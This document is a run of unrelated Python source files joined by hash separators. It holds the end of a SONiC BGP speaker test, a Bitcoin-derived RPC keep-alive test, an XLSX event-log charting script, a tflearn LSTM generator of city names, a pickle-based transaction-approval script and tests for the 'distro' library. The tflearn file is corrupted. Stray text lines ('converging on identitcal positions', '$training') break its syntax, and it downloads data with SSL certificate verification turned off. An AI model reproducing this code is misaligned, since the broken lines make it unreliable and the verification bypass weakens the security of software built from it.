log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
logger.info("Withdraw routes")
withdraw_route(ptfip, lo_addr, prefix, nexthop_ips[1].ip, port_num[0])
withdraw_route(ptfip, lo_addr, prefix, nexthop_ips[2].ip, port_num[1])
withdraw_route(ptfip, lo_addr, peer_range, vlan_ips[0].ip, port_num[2])
logger.info("Nexthop ip%s tests are done" % family)
@pytest.mark.parametrize("ipv4, ipv6, mtu", [pytest.param(True, False, 1514)])
def test_bgp_speaker_announce_routes(common_setup_teardown, tbinfo, duthosts, rand_one_dut_hostname, ptfhost, ipv4, ipv6, mtu, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
duthost = duthosts[rand_one_dut_hostname]
nexthops = common_setup_teardown[3]
bgp_speaker_announce_routes_common(common_setup_teardown, tbinfo, duthost, ptfhost, ipv4, ipv6, mtu, "v4", "10.10.10.0/26", nexthops, vlan_mac)
@pytest.mark.parametrize("ipv4, ipv6, mtu", [pytest.param(False, True, 1514)])
def test_bgp_speaker_announce_routes_v6(common_setup_teardown, tbinfo, duthosts, rand_one_dut_hostname, ptfhost, ipv4, ipv6, mtu, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
duthost = duthosts[rand_one_dut_hostname]
nexthops = common_setup_teardown[4]
bgp_speaker_announce_routes_common(common_setup_teardown, tbinfo, duthost, ptfhost, ipv4, ipv6, mtu, "v6", "fc00:10::/64", nexthops, vlan_mac)
|
py | b40b393a5515147a3657cb132d8d7b9541df049e | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because fivegd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
py | b40b39b396a9d2a075ae6cb3d8e69c0742079f3c | from __future__ import print_function
import argparse
from collections import Counter
from datetime import datetime
import os
import sys
from utility import utilcsv
try:
import xlsxwriter
except ImportError:
print("[-] Install required third-party module xlsxwriter")
sys.exit(1)
"""
MIT License
Copyright (c) 2017 Chapin Bryce, Preston Miller
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["Chapin Bryce", "Preston Miller"]
__date__ = 20170815
__description__ = "Create charts in XLSX files"
def main(output_directory):
print("[+] Reading in sample data set")
# Skip first row of headers
data = utilcsv.csv_reader("redacted_sample_event_log.csv")[1:]
xlsx_writer(data, output_directory)
def xlsx_writer(data, output_directory):
print("[+] Writing output.xlsx file to {}".format(output_directory))
workbook = xlsxwriter.Workbook(
os.path.join(output_directory, "output.xlsx"))
dashboard = workbook.add_worksheet("Dashboard")
data_sheet = workbook.add_worksheet("Data")
title_format = workbook.add_format({
'bold': True, 'font_color': 'white', 'bg_color': 'black',
'font_size': 30, 'font_name': 'Calibri', 'align': 'center'
})
date_format = workbook.add_format(
{'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
# Write CSV data to Data worksheet
for i, record in enumerate(data):
data_sheet.write_number(i, 0, int(record[0]))
data_sheet.write(i, 1, record[1])
data_sheet.write(i, 2, record[2])
dt = datetime.strptime(record[3], "%m/%d/%Y %H:%M:%S %p")
data_sheet.write_datetime(i, 3, dt, date_format)
data_sheet.write_number(i, 4, int(record[4]))
data_sheet.write(i, 5, record[5])
data_sheet.write_number(i, 6, int(record[6]))
data_sheet.write(i, 7, record[7])
data_length = len(data) + 1
data_sheet.add_table(
"A1:H{}".format(data_length),
{"columns": [
{"header": "Index"},
{"header": "File Name"},
{"header": "Computer Name"},
{"header": "Written Date"},
{"header": "Event Level"},
{"header": "Event Source"},
{"header": "Event ID"},
{"header": "File Path"}
]}
)
event_ids = Counter([x[6] for x in data])
dashboard.merge_range('A1:Q1', 'Event Log Dashboard', title_format)
for i, record in enumerate(event_ids):
dashboard.write(100 + i, 0, record)
dashboard.write(100 + i, 1, event_ids[record])
dashboard.add_table("A100:B{}".format(
100 + len(event_ids)),
{"columns": [{"header": "Event ID"}, {"header": "Occurrence"}]}
)
event_chart = workbook.add_chart({'type': 'bar'})
event_chart.set_title({'name': 'Event ID Breakdown'})
event_chart.set_size({'x_scale': 2, 'y_scale': 5})
event_chart.add_series(
{'categories': '=Dashboard!$A$101:$A${}'.format(
100 + len(event_ids)),
'values': '=Dashboard!$B$101:$B${}'.format(
100 + len(event_ids))})
dashboard.insert_chart('C5', event_chart)
workbook.close()
if __name__ == "__main__":
# Command-line Argument Parser
parser = argparse.ArgumentParser(
description=__description__,
epilog="Developed by {} on {}".format(
", ".join(__authors__), __date__)
)
parser.add_argument("OUTPUT_DIR", help="Desired Output Path")
args = parser.parse_args()
if not os.path.exists(args.OUTPUT_DIR):
os.makedirs(args.OUTPUT_DIR)
main(args.OUTPUT_DIR)
|
py | b40b39be10941ce6bb65fac566249b9baf7fa8fd | from __future__ import absolute_import, division, print_function
import os
from six import moves
import ssl
import tflearn
from tflearn.data_utils import *
path = "US_Cities.txt"
if not os.path.isfile(path):
context = ssl._create_unverified_context()
moves.urllib.request.urlretrieve("https://raw.githubusercontent.com/tflearn/tflearn.github.io/master/resources/US_Cities.txt", path, context=context)
maxlen = 20
X, Y, char_idx = \
textfile_to_semi_redundant_sequences(path, seq_maxlen=maxlen, redun_step=3)
g = tflearn.input_data(shape=[None, maxlen, len(char_idx)])
g = tflearn.lstm(g, 512, return_seq=True)
converging on identitcal positions
g = tflearn.dropout(g, 0.5)
g = tflearn.lstm(g, 512)
g = tflearn.dropout(g, 0.5)
g = tflearn.fully_connected(g, len(char_idx), activation='softmax')
g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy',
learning_rate=0.001)
m = tflearn.SequenceGenerator(g, dictionary=char_idx,
seq_maxlen=maxlen,
clip_gradients=5.0,
checkpoint_path='model_us_cities')
$training
for i in range(40):
seed = random_sequence_from_textfile(path, maxlen)
m.fit(X, Y, validation_set=0.1, batch_size=128,
n_epoch=1, run_id='us_cities')
print("-- TESTING...")
print("-- Test with temperature of 1.2 --")
print(m.generate(30, temperature=1.2, seq_seed=seed))
print("-- Test with temperature of 1.0 --")
print(m.generate(30, temperature=1.0, seq_seed=seed))
print("-- Test with temperature of 0.5 --")
print(m.generate(30, temperature=0.5, seq_seed=seed))
|
py | b40b3a93fe2d044420efe32008b98c9c75cbcd71 | #import pickle
#import sys
#loaded_model_d = pickle.load(open('default_model.mdl', 'rb'))
#loaded_model_nd = pickle.load(open('not_default_model.mdl', 'rb'))
#pos_prob_d = loaded_model_d.predict(mdata)
#pos_prob_nd = loaded_model_nd.predict(mdata)
#print(pos_prob_nd > pos_prob_d)
import sys, getopt, pickle
def main(argv):
user_id = ''
transaction_value = ''
try:
opts, args = getopt.getopt(argv,"hu:v:",["user_id=","transaction_value="])
except getopt.GetoptError:
print('transaction_approval_service.py -u <user_id> -v <transaction_value>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('Usage:')
print('transaction_approval_service.py -u <user_id> -v <transaction_value>')
sys.exit()
elif opt in ("-u", "--user_id"):
user_id = arg
elif opt in ("-v", "--transaction_value"):
transaction_value = arg
loaded_model_d = pickle.load(open('default_model.mdl', 'rb'))
loaded_model_nd = pickle.load(open('not_default_model.mdl', 'rb'))
import numpy as np
recovered_data = np.loadtxt('test.out', delimiter=',')
pattern = recovered_data[np.random.randint(len(recovered_data),size=1),:]
pos_prob_nd = loaded_model_nd.predict(pattern)
pos_prob_d = loaded_model_d.predict(pattern)
result = pos_prob_nd > pos_prob_d
print(result[0])
if __name__ == "__main__":
main(sys.argv[1:]) |
py | b40b3aa524e3fde7ca05420bd69003e3205b2662 | # Copyright 2015,2016 Nir Cohen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import io
import json
import os
import subprocess
import sys
from types import FunctionType
from typing import Any, Dict, List, NoReturn, Optional
import pytest
BASE = os.path.abspath(os.path.dirname(__file__))
RESOURCES = os.path.join(BASE, "resources")
DISTROS_DIR = os.path.join(RESOURCES, "distros")
TESTDISTROS = os.path.join(RESOURCES, "testdistros")
SPECIAL = os.path.join(RESOURCES, "special")
DISTROS = [dist for dist in os.listdir(DISTROS_DIR) if dist != "__shared__"]
IS_LINUX = sys.platform.startswith("linux")
if IS_LINUX:
from distro import distro
RELATIVE_UNIXCONFDIR = distro._UNIXCONFDIR[1:]
RELATIVE_UNIXUSRLIBDIR = distro._UNIXUSRLIBDIR[1:]
MODULE_DISTRO = distro._distro
class TestNonLinuxPlatform:
def test_cant_use_on_windows(self) -> None:
try:
import distro # NOQA
except ImportError as ex:
assert "Unsupported platform" in str(ex)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestCli:
def _parse(self, command: str) -> None:
sys.argv = command.split()
distro.main()
def _run(self, command: List[str]) -> str:
r = subprocess.run(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
return r.stdout
def test_cli_for_coverage_yuch(self) -> None:
self._parse("distro")
self._parse("distro -j")
def test_cli_can_parse_root_dir_args(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
self._parse(f"distro --root-dir {root_dir}")
def test_cli(self) -> None:
command = [sys.executable, "-m", "distro"]
desired_output = f"Name: {distro.name(pretty=True)}"
distro_version = distro.version(pretty=True)
distro_codename = distro.codename()
desired_output += f"\nVersion: {distro_version}"
desired_output += f"\nCodename: {distro_codename}"
desired_output += "\n"
assert self._run(command) == desired_output
def test_cli_json(self) -> None:
command = [sys.executable, "-m", "distro", "-j"]
assert ast.literal_eval(self._run(command)) == distro.info()
def test_cli_with_root_dir(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
command = [sys.executable, "-m", "distro", "--root-dir", root_dir]
desired_output = "Name: Fedora 30 (Thirty)\nVersion: 30\nCodename: \n"
assert desired_output == self._run(command)
def test_cli_with_root_dir_as_json(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
command = [sys.executable, "-m", "distro", "-j", "--root-dir", root_dir]
desired_output = {
"codename": "",
"id": "fedora",
"like": "",
"version": "30",
"version_parts": {"build_number": "", "major": "30", "minor": ""},
}
results = json.loads(self._run(command))
assert desired_output == results
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class DistroTestCase:
"""A base class for any testcase classes that test the distributions
represented in the `DISTROS` subtree.
"""
def setup_method(self, test_method: FunctionType) -> None:
# The environment stays the same across all testcases, so we
# save and restore the PATH env var in each test case that
# changes it:
self._saved_path = os.environ["PATH"]
self._saved_UNIXCONFDIR = distro._UNIXCONFDIR
self._saved_UNIXUSRLIBDIR = distro._UNIXUSRLIBDIR
def teardown_method(self, test_method: FunctionType) -> None:
os.environ["PATH"] = self._saved_path
distro._UNIXCONFDIR = self._saved_UNIXCONFDIR
distro._UNIXUSRLIBDIR = self._saved_UNIXUSRLIBDIR
def _setup_for_distro(self, distro_root: str) -> None:
distro_bin = os.path.join(distro_root, "bin")
# We don't want to pick up a possibly present lsb_release in the
# distro that runs this test, so we use a PATH with only one entry:
os.environ["PATH"] = distro_bin
distro._UNIXCONFDIR = os.path.join(distro_root, RELATIVE_UNIXCONFDIR)
distro._UNIXUSRLIBDIR = os.path.join(distro_root, RELATIVE_UNIXUSRLIBDIR)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOSRelease:
def setup_method(self, test_method: FunctionType) -> None:
dist = test_method.__name__.split("_")[1]
os_release = os.path.join(DISTROS_DIR, dist, "etc", "os-release")
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file=os_release,
distro_release_file="path-to-non-existing-file",
)
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
def test_arch_os_release(self) -> None:
desired_outcome = {
"id": "arch",
"name": "Arch Linux",
"pretty_name": "Arch Linux",
}
self._test_outcome(desired_outcome)
def test_kali_os_release(self) -> None:
desired_outcome = {
"id": "kali",
"name": "Kali GNU/Linux",
"pretty_name": "Kali GNU/Linux Rolling",
"version": "2017.1",
"pretty_version": "2017.1",
"best_version": "2017.1",
"like": "debian",
}
self._test_outcome(desired_outcome)
def test_centos7_os_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7 (Core)",
"version": "7",
"pretty_version": "7 (Core)",
"best_version": "7",
"like": "rhel fedora",
"codename": "Core",
}
self._test_outcome(desired_outcome)
def test_coreos_os_release(self) -> None:
desired_outcome = {
"id": "coreos",
"name": "CoreOS",
"pretty_name": "CoreOS 899.15.0",
"version": "899.15.0",
"pretty_version": "899.15.0",
"best_version": "899.15.0",
}
self._test_outcome(desired_outcome)
def test_debian8_os_release(self) -> None:
desired_outcome = {
"id": "debian",
"name": "Debian GNU/Linux",
"pretty_name": "Debian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"codename": "jessie",
}
self._test_outcome(desired_outcome)
def test_fedora19_os_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
}
self._test_outcome(desired_outcome)
def test_fedora23_os_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
}
self._test_outcome(desired_outcome)
def test_fedora30_os_release(self) -> None:
# Fedora 21 and above no longer have code names but the metadata in
# os-release was only changed in a detectable way in Fedora 30+. The
# piece in parenthesis in the pretty_name field contains the VARIANT
# and differs depending on the variant which was installed.
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30",
"best_version": "30",
"codename": "",
}
self._test_outcome(desired_outcome)
def test_kvmibm1_os_release(self) -> None:
desired_outcome = {
"id": "kvmibm",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"like": "rhel fedora",
"codename": "Z",
}
self._test_outcome(desired_outcome)
def test_linuxmint17_os_release(self) -> None:
# Note: LinuxMint 17 actually *does* have Ubuntu 14.04 data in its
# os-release file. See discussion in GitHub issue #78.
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
}
self._test_outcome(desired_outcome)
def test_mageia5_os_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5",
"version": "5",
"pretty_version": "5",
"best_version": "5",
"like": "mandriva fedora",
}
self._test_outcome(desired_outcome)
def test_manjaro1512_os_release(self) -> None:
self._test_outcome(
{"id": "manjaro", "name": "Manjaro Linux", "pretty_name": "Manjaro Linux"}
)
def test_opensuse42_os_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1",
"best_version": "42.1",
"like": "suse",
}
self._test_outcome(desired_outcome)
def test_opensuse15_os_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 15.2",
"version": "15.2",
"pretty_version": "15.2",
"best_version": "15.2",
"like": "suse opensuse",
}
self._test_outcome(desired_outcome)
def test_raspbian7_os_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 7 (wheezy)",
"version": "7",
"pretty_version": "7 (wheezy)",
"best_version": "7",
"like": "debian",
"codename": "wheezy",
}
self._test_outcome(desired_outcome)
def test_raspbian8_os_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"like": "debian",
"codename": "jessie",
}
self._test_outcome(desired_outcome)
def test_rhel7_os_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
"best_version": "7.0",
"like": "fedora",
"codename": "Maipo",
}
self._test_outcome(desired_outcome)
def test_rocky_os_release(self) -> None:
desired_outcome = {
"id": "rocky",
"name": "Rocky Linux",
"pretty_name": "Rocky Linux 8.4 (Green Obsidian)",
"version": "8.4",
"pretty_version": "8.4 (Green Obsidian)",
"best_version": "8.4",
"like": "rhel centos fedora",
"codename": "Green Obsidian",
}
self._test_outcome(desired_outcome)
def test_slackware14_os_release(self) -> None:
desired_outcome = {
"id": "slackware",
"name": "Slackware",
"pretty_name": "Slackware 14.1",
"version": "14.1",
"pretty_version": "14.1",
"best_version": "14.1",
}
self._test_outcome(desired_outcome)
def test_sles12_os_release(self) -> None:
desired_outcome = {
"id": "sles",
"name": "SLES",
"pretty_name": "SUSE Linux Enterprise Server 12 SP1",
"version": "12.1",
"pretty_version": "12.1",
"best_version": "12.1",
}
self._test_outcome(desired_outcome)
def test_ubuntu14_os_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
}
self._test_outcome(desired_outcome)
def test_ubuntu16_os_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 16.04.1 LTS",
"version": "16.04",
"pretty_version": "16.04 (xenial)",
"best_version": "16.04.1",
"like": "debian",
"codename": "xenial",
}
self._test_outcome(desired_outcome)
def test_amazon2016_os_release(self) -> None:
desired_outcome = {
"id": "amzn",
"name": "Amazon Linux AMI",
"pretty_name": "Amazon Linux AMI 2016.03",
"version": "2016.03",
"pretty_version": "2016.03",
"best_version": "2016.03",
"like": "rhel fedora",
}
self._test_outcome(desired_outcome)
def test_scientific7_os_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 7.2 (Nitrogen)",
"version": "7.2",
"pretty_version": "7.2 (Nitrogen)",
"best_version": "7.2",
"like": "fedora",
"codename": "Nitrogen",
}
self._test_outcome(desired_outcome)
def test_gentoo_os_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo",
"pretty_name": "Gentoo/Linux",
}
self._test_outcome(desired_outcome)
def test_openelec6_os_release(self) -> None:
desired_outcome = {
"id": "openelec",
"name": "OpenELEC",
"pretty_name": "OpenELEC (official) - Version: 6.0.3",
"version": "6.0",
"pretty_version": "6.0",
"best_version": "6.0.3",
}
self._test_outcome(desired_outcome)
def test_cloudlinux7_os_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"like": "rhel fedora centos",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome)
class TestWithRootDir(TestOSRelease):
"""Test that a LinuxDistribution can be created using an arbitrary root_dir
on all OSes.
"""
def setup_method(self, test_method: FunctionType) -> None:
dist = test_method.__name__.split("_")[1]
root_dir = os.path.join(DISTROS_DIR, dist)
self.distro = distro.LinuxDistribution(
include_lsb=False,
include_uname=False,
include_oslevel=False,
os_release_file="",
distro_release_file="path-to-non-existing-file",
root_dir=root_dir,
)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestLSBRelease(DistroTestCase):
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
dist = test_method.__name__.split("_")[1]
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
def test_linuxmint17_lsb_release(self) -> None:
desired_outcome = {
"id": "linuxmint",
"name": "LinuxMint",
"pretty_name": "Linux Mint 17.3 Rosa",
"version": "17.3",
"pretty_version": "17.3 (rosa)",
"best_version": "17.3",
"codename": "rosa",
}
self._test_outcome(desired_outcome)
def test_manjaro1512_lsb_release(self) -> None:
self._test_outcome(
{
"id": "manjarolinux",
"name": "ManjaroLinux",
"pretty_name": "Manjaro Linux",
"version": "15.12",
"pretty_version": "15.12 (Capella)",
"best_version": "15.12",
"codename": "Capella",
}
)
# @pytest.mark.xfail
# def test_openelec6_lsb_release(self) -> None:
# # TODO: This should be fixed as part of #109 when dealing
# # with distro inconsistencies
# desired_outcome = {
# 'id': 'openelec',
# 'name': 'OpenELEC',
# 'pretty_name': 'OpenELEC (official) - Version: 6.0.3',
# 'version': '6.0.3',
# 'pretty_version': '6.0.3',
# 'best_version': '6.0.3',
# }
# self._test_outcome(desired_outcome)
def test_openbsd62_uname(self) -> None:
self._test_outcome(
{
"id": "openbsd",
"name": "OpenBSD",
"version": "6.2",
"pretty_name": "OpenBSD 6.2",
"pretty_version": "6.2",
"best_version": "6.2",
}
)
def test_netbsd711_uname(self) -> None:
self._test_outcome(
{
"id": "netbsd",
"name": "NetBSD",
"version": "7.1.1",
"pretty_name": "NetBSD 7.1.1",
"pretty_version": "7.1.1",
"best_version": "7.1.1",
}
)
def test_freebsd111_uname(self) -> None:
self._test_outcome(
{
"id": "freebsd",
"name": "FreeBSD",
"version": "11.1",
"pretty_name": "FreeBSD 11.1",
"pretty_version": "11.1",
"best_version": "11.1",
}
)
def test_midnightbsd12_uname(self) -> None:
self._test_outcome(
{
"id": "midnightbsd",
"name": "MidnightBSD",
"version": "1.2",
"pretty_name": "MidnightBSD 1.2",
"pretty_version": "1.2",
"best_version": "1.2",
}
)
def test_ubuntu14normal_lsb_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", "ubuntu14_normal"))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
def test_ubuntu14nomodules_lsb_release(self) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", "ubuntu14_nomodules"))
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
def test_trailingblanks_lsb_release(self) -> None:
self._setup_for_distro(
os.path.join(TESTDISTROS, "lsb", "ubuntu14_trailingblanks")
)
self.distro = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (trusty)",
"best_version": "14.04.3",
"codename": "trusty",
}
self._test_outcome(desired_outcome)
@pytest.mark.parametrize("errnum", ("001", "002", "126", "130", "255"))
def test_lsb_release_error_level(self, errnum: str) -> None:
self._setup_for_distro(os.path.join(TESTDISTROS, "lsb", f"lsb_rc{errnum}"))
lsb_release_info = distro.LinuxDistribution(
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)._lsb_release_info
assert lsb_release_info == {}
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestSpecialRelease(DistroTestCase):
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
